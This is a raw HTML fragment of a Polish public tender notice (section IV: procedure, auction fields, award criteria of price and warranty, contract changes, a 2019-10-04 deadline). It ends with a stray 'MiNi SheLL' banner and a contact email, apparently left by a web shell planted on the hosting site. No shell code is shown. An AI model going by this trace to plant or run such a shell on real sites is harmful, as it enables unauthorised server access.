id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow">Nie</span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani">Nie</span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Długość okresu gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Istotne postanowienia, które zostaną wprowadzone do treści zawieranej umowy zostały ujęte w załączniku do SIWZ - projekt umowy, stanowiącym integralną część SIWZ.Nie dopuszcza się zmian umowy i wprowadzania postanowień niekorzystnych dla Zamawiającego oraz takich, przy których uwzględnieniu należałoby zmienić treść oferty Wykonawcy.Niedopuszczalna jest, pod rygorem nieważności, zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy chyba, że łączna wartość zmian jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 Prawa zamówień publicznych i jest mniejsza od 10% wartości zamówienia określonej pierwotnie w umowie lub konieczność wprowadzenia zmian wynika z okoliczności, o których mowa w pkt. 17.3 niniejszego rozdziału.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-10-04</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">13:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com